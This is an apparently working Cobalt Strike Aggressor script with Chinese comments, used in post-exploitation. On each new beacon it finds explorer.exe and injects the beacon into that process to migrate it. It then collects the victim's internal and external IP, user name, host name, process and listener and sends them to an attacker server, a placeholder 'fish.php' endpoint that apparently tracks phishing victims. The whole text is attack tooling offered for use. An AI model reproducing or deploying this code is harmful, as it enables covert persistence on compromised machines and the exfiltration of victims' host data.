# 循环获取所有beacon
on beacon_initial {
	sub callback{
		$migrate = '(.*\n)+explorer.exe\t\d+\t(\d+)(.*\n)+'; #这里更改注入的程序名称
		$listener = "CDN"; #这里更改注入的监听名称为自己CS监听器名称
		if ($2 ismatch $migrate){
			$pid = matched()[1];
			$inject_pid = $pid;
			if (-is64 $1){
				$arch = "x64";  #程序在判断操作系统位数
			}
			else{
				$arch = "x86";
			}
			binject($1, $pid, $listener, $arch);  
		}
	}
	if($inject_pid != beacon_info($1,"pid")){
		bps($1, &callback);
	}
	sub http_get {
		local('$output');
		$url = [new java.net.URL: $1];
		$stream = [$url openStream];
		$handle = [SleepUtils getIOHandle: $stream, $null];
		@content = readAll($handle);
		foreach $line (@content) {
			$output .= $line . "\r\n";
		}
		println($output);
	}
	#获取主机相关信息
	$internalIP = replace(beacon_info($1, "internal"), " ", "_");	#内网IP
	$userName = replace(beacon_info($1, "user"), " ", "_");	#用户名
    $computerName = replace(beacon_info($1, "computer"), " ", "_");	#主机名
	$Process = replace(beacon_info($1, "process"), " ", "_");	#载荷名
	$Listener = replace(beacon_info($1, "listener"), " ", "_");	#监听器
	$externalIP = replace(beacon_info($1, "external"), " ", "_");	#公网IP
	#发送数据到服务端,下方填写自己地址
	$url = "http://xxxxx/fish.php?source=fish&internalIP=".$internalIP."&userName=".$userName."&computerName=".$computerName."&externalIP=".$externalIP."&Process=".$Process."&Listener=".$Listener;
	http_get($url);
}